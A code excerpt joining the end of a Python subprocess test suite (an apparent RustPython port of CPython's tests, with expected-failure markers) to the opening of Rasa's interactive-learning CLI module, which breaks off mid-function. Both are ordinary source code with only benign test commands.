with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
        # Wait until the real process completes to avoid leaving a zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_kill_dead(self):
self._kill_dead_process('kill')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
        This avoids having to get test environments to send and receive
        signals reliably across platforms. The net effect of a ^C during a
        blocking subprocess call that we want to clean up after is a
        KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
            # clean up the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_call_keyboardinterrupt_no_kill = unittest.expectedFailure(test_call_keyboardinterrupt_no_kill)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_run_keyboardinterrupt_no_kill = unittest.expectedFailure(test_run_keyboardinterrupt_no_kill)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_getoutput = unittest.expectedFailure(test_getoutput)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_invalid_args = unittest.expectedFailure(test_invalid_args)
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union, Set
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from rasa.nlu.training_data.loading import MARKDOWN, RASA
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cli_utils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels.channel import UserMessage
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
UTTER_PREFIX,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.importers.rasa import TrainingDataImporter
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {
"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml",
}
SAVE_IN_E2E = False
# sentinel values for UI choice lists; random uuid4 hex so they cannot clash with existing intent or action names
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
NEW_TEMPLATES = {}
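# maps newly created utter_* action names to their response text; filled during the session and merged into the domain on export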
MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION = 200
DEFAULT_STORY_GRAPH_FILE = "story_graph.dot"
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
conversation_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"text": message,
"parse_data": parse_data,
}
return await endpoint.request(
json=payload,
method="post",
subpath=f"/conversations/{conversation_id}/messages",
)
async def request_prediction(
endpoint: EndpointConfig, conversation_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(
method="post", subpath=f"/conversations/{conversation_id}/predict"
)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(
method="get", subpath="/domain", headers={"Accept": "application/json"}
)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
conversation_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = f"/conversations/{conversation_id}/tracker?include_events={verbosity.name}"
return await endpoint.request(
method="get", subpath=path, headers={"Accept": "application/json"}
)
async def send_action(
endpoint: EndpointConfig,
conversation_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False,
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = f"/conversations/{conversation_id}/execute"
try:
return await endpoint.request(json=payload, method="post", subpath=subpath)
except ClientError:
if is_new_action:
if action_name in NEW_TEMPLATES:
warning_questions = questionary.confirm(
f"WARNING: You have created a new action: '{action_name}', "
f"with matching template: '{[*NEW_TEMPLATES[action_name]][0]}'. "
f"This action will not return its message in this session, "
f"but the new utterance will be saved to your domain file "
f"when you exit and save this session. "
f"You do not need to do anything further."
)
await _ask_questions(warning_questions, conversation_id, endpoint)
else:
warning_questions = questionary.confirm(
f"WARNING: You have created a new action: '{action_name}', "
f"which was not successfully executed. "
f"If this action does not return any events, "
f"you do not need to do anything. "
f"If this is a custom action which returns events, "
f"you are recommended to implement this action "
f"in your action server and try again."
)
await _ask_questions(warning_questions, conversation_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, conversation_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
conversation_id: Text,
evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = f"/conversations/{conversation_id}/tracker/events"
return await endpoint.request(json=evt, method="post", subpath=subpath)
def format_bot_output(message: BotUttered) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.text or ""
# Then, append all additional items
data = message.data or {}
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
choices = cli_utils.button_choices_from_message_data(
data, allow_free_text_input=True
)
for choice in choices:
output += "\n" + choice
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = cli_utils.element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = cli_utils.element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return events[: -(i + 1)]
return events
async def _ask_questions(
questions: Union[Form, Question],
conversation_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(conversation_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = f'{p.get("confidence"):03.2f} {p.get("name"):40}'
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
async def _request_free_text_intent(
conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.text(
message="Please type the intent name:",
validate=io_utils.not_empty_validator("Please enter an intent name"),
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_free_text_action(
conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.text(
message="Please type the action name:",
validate=io_utils.not_empty_validator("Please enter an action name"),
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_free_text_utterance(
conversation_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
question = questionary.text(
message=(
f"Please type the message for your new utterance " f"template '{action}':"
),
validate=io_utils.not_empty_validator("Please enter a template message"),
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_selection_from_intents(
intents: List[Dict[Text, Text]], conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intents)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]], conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?", choices=forks
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_fork_from_user(
conversation_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means the
conversation will be reset and continued from that earlier point."""
tracker = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(
list(reversed(choices)), conversation_id, endpoint
)
if fork_idx is not None:
return tracker.get("events", [])[: int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message, intents, conversation_id, endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = [
{"name": "<create_new_intent>", "value": OTHER_INTENT}
] + _selection_choices_from_intent_prediction(predictions)
intent_name = await _request_selection_from_intents(
choices, conversation_id, endpoint
)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(conversation_id, endpoint)
selected_intent = {"name": intent_name, "confidence": 1.0}
else:
# returns the selected intent with the original probability value
selected_intent = next(
(x for x in predictions if x["name"] == intent_name), {"name": None}
)
return selected_intent
async def _print_history(conversation_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
table = _chat_history_table(events)
slot_strings = _slot_history(tracker_dump)
print("------")
print("Chat History\n")
print(table)
if slot_strings:
print("\n")
print(f"Current slots: \n\t{', '.join(slot_strings)}\n")
print("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt: Text, max_width: int) -> Text:
return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
def colored(txt: Text, color: Text) -> Text:
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
intent = user_event.intent or {}
intent_name = intent.get("name", "")
_confidence = intent.get("confidence", 1.0)
_md = _as_md_message(user_event.parse_data)
_lines = [
colored(wrap(_md, max_width), "hired"),
f"intent: {intent_name} {_confidence:03.2f}",
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
[
"# ",
Color(colored("Bot ", "autoblue")),
" ",
Color(colored("You ", "hired")),
]
]
table = SingleTable(table_data, "Chat History")
bot_column = []
tracker = DialogueStateTracker.from_dict("any", events)
applied_events = tracker.applied_events()
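# applied_events() has already dropped reverted/undone events, so only the effective history is rendered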
for idx, event in enumerate(applied_events):
if isinstance(event, ActionExecuted):
bot_column.append(colored(event.action_name, "autocyan"))
if event.confidence is not None:
bot_column[-1] += colored(f" {event.confidence:03.2f}", "autowhite")
elif isinstance(event, UserUttered):
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(event, user_width(table))
add_user_cell(table_data, msg)
elif isinstance(event, BotUttered):
wrapped = wrap(format_bot_output(event), bot_width(table))
bot_column.append(colored(wrapped, "autoblue"))
else:
if event.as_story_string():
bot_column.append(wrap(event.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strings = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cli_utils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strings.append(f"{k}: {colored_value}")
return slot_strings
async def _write_data_to_file(conversation_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, conversation_id)
events = tracker.get("events", [])
serialised_domain = await retrieve_domain(endpoint)
domain = Domain.from_dict(serialised_domain)
await _write_stories_to_file(story_path, events, domain)
await _write_nlu_to_file(nlu_path, events)
await _write_domain_to_file(domain_path, events, domain)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(conversation_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[
Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit"),
],
).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(conversation_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
